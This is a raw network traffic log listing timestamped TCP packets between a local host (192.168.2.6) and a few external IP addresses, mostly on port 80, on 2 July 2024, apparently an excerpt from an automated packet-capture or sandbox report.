Jul 2, 2024 00:05:08.016756058 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016767025 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016777039 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016787052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016797066 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016808987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016819954 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016819954 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016855955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016865969 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016865969 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016866922 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016879082 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016887903 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016897917 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016908884 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016912937 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016912937 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016927958 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016957045 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.017061949 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017077923 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017088890 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017110109 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.017119884 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.017155886 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017167091 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017175913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017187119 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017206907 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.017230988 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.017247915 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017294884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.017311096 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017323017 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017373085 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017374039 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.017374039 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.017385006 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.017416954 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.017441034 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.017637014 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017683029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017683029 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.017695904 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017735958 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.017735958 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.017772913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017784119 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017795086 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017806053 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017824888 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.017853022 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.017935991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017946959 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017957926 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017966986 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017977953 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.017987967 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.018007994 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.018027067 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.018105030 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.018145084 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.018210888 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.018263102 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.018723011 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018735886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018765926 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.018805027 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.018819094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018831015 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018836975 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.018846989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018857956 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018877983 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.018877983 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.018897057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018908978 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018918991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018920898 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.018928051 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018939018 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.018939018 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.018944979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018955946 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.018963099 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.018985033 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019016981 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019639015 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019650936 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019660950 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019695997 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019695997 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019714117 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019732952 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019743919 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019753933 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019764900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019788027 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019788027 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019824982 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019891024 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019901991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019912004 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019922972 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019933939 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.019937992 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019937992 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019970894 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019994020 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.019999027 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.020045996 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.020114899 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.020124912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.020155907 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.020165920 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.020239115 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.020318985 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.020329952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.020342112 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.020380974 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.020380974 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.020473957 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.020518064 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.020662069 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.020720959 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.020745993 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.020757914 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.020797014 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.020797014 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.020824909 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.020834923 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.020844936 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.020855904 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.020884991 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.020884991 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.020940065 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.020951986 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.020962000 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.020972013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.020982027 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.020992041 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.021002054 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.021002054 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.021002054 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.021017075 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.021037102 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.021064997 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.021280050 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.021295071 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.021317959 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.021336079 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.021557093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.021569967 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.021580935 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.021609068 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.021609068 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.021646023 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.021671057 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.021682978 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.021692991 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.021703959 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.021727085 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.021737099 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.021780014 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.021956921 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.021967888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.021979094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.021989107 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.021998882 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022008896 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022020102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022049904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.022049904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.022063971 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.022085905 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.022151947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022161961 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022171974 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022182941 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022192955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022202015 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.022202969 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022214890 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022222996 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.022224903 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022236109 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022238970 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.022247076 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022275925 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.022286892 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.022584915 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022595882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022605896 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022617102 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022629023 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.022645950 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.022679090 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022690058 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022701025 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022706032 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.022711039 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022718906 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.022722006 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022748947 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.022748947 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.022789955 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.022897005 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022907019 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022917986 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022927999 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022938013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022948027 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.022958994 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.022964001 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.023006916 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.023008108 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.023008108 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.023188114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023199081 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023207903 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023217916 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023227930 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023236990 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.023240089 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023251057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023262024 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023262978 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.023277998 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.023313999 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.023464918 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023477077 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023488045 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023498058 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.023508072 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.023552895 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.023644924 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.023657084 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.023667097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.023677111 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.023698092 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.023725033 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.023725033 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.023761034 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.023814917 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.023967981 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024020910 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.024197102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.024285078 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.024300098 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.024311066 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.024358034 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.024358034 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.024408102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.024419069 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.024429083 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.024439096 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.024451971 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.024475098 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.024487972 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.024527073 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.024538994 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024549007 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024558067 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024568081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024579048 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024581909 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.024590015 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024599075 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.024600029 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024621010 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.024621010 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.024676085 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.024766922 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024781942 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024806023 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.024857044 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.024863005 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024872065 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024883032 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.024915934 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.024915934 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.024928093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.024981976 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.025018930 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.025434017 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.025474072 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.025486946 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.025515079 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.025579929 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.025590897 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.025600910 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.025630951 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.025630951 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.025665998 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.025777102 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.025788069 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.025798082 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.025809050 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.025818110 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.025840998 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.025891066 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.025921106 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.025932074 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.025942087 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.025953054 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.025964022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.025974035 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.025979996 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.025979996 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.025986910 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.025998116 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026010036 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026021004 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026055098 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026284933 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026297092 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026305914 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026316881 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026324034 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026328087 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026338100 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026345015 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026345015 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026349068 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026359081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026370049 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026398897 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026398897 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026401997 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026422977 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026597023 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026638985 CEST	49717	80	192.168.2.6	77.91.77.80
